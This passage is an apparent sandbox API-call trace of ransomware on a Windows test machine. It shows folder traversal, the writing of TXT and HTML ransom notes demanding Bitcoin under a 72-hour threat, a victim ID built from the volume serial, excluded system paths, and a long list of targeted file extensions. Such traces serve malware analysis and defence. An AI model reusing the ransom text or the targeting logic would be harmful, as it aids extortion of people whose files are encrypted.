	[0187.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0187.193] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1
	[0187.193] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1
	[0187.193] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.193] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0187.193] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos"
	[0187.193] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos"
	[0187.193] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\"
	[0187.194] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\"
	[0187.194] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*"
	[0187.194] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.194] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0187.194] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos"
	[0187.194] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*"
	[0187.194] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.195] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.195] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0187.195] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.196] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0187.196] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0187.217] CloseHandle (hObject=0x384) returned 1
	[0187.218] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.219] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0187.220] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0187.220] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.220] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0187.220] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0187.221] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0187.221] CloseHandle (hObject=0x384) returned 1
	[0187.221] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.221] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.222] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0187.222] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0187.222] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.222] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0187.223] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0187.225] CloseHandle (hObject=0x384) returned 1
	[0187.225] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.226] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.226] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.227] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0187.228] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.228] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.228] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0187.228] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.229] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0187.230] CloseHandle (hObject=0x384) returned 1
	[0187.230] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.230] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0187.230] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88760bfa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x88760bfa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x88760bfa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x2360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oqppyb09odsqs8rb6b.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="OQPPYB~1.SCL")) returned 1
	[0187.230] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x839084fb, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x839084fb, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1
	[0187.230] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1
	[0187.231] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1
	[0187.231] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0187.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files"
	[0187.231] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files"
	[0187.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\"
	[0187.231] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\"
	[0187.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*"
	[0187.232] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x839084fb, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x886727b4, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0187.233] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*") returned 49
	[0187.233] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.234] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*") returned 0x31
	[0187.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.234] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="windows") returned 0x0
	[0187.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.234] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="boot") returned 0x0
	[0187.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="system volume information") returned 0x0
	[0187.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0187.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="temp") returned 0x0
	[0187.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="program files") returned 0x0
	[0187.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="program files (x86)") returned 0x0
	[0187.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="appdata") returned 0x0
	[0187.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="application data") returned 0x0
	[0187.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="winnt") returned 0x0
	[0187.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.237] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="tmp") returned 0x0
	[0187.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="cache") returned 0x0
	[0187.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="temporary internet files") returned 0x0
	[0187.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.238] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="webcache") returned 0x0
	[0187.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.239] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="inetcache") returned 0x0
	[0187.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.239] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="nvidia") returned 0x0
	[0187.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.239] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="packages") returned 0x0
	[0187.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.240] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="cookies") returned 0x0
	[0187.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.240] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="programdata") returned 0x0
	[0187.240] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x839084fb, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x886727b4, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0187.240] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x8866b39a, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 1
	[0187.240] lstrcmpW (lpString1="achoo@gdllo.de.pst", lpString2="..") returned 1
	[0187.240] lstrcmpW (lpString1="achoo@gdllo.de.pst", lpString2=".") returned 1
	[0187.241] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\"
	[0187.241] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\", lpString2="achoo@gdllo.de.pst" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst"
	[0187.241] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst") returned 64
	[0187.241] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.241] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst") returned 0x40
	[0187.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.241] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst", lpSrch="help_decrypt_your_files") returned 0x0
	[0187.241] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst") returned="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst"
	[0187.242] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst") returned 64
	[0187.242] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.242] StrStrW (lpFirst=".pst", lpSrch=".") returned=".pst"
	[0187.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.243] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.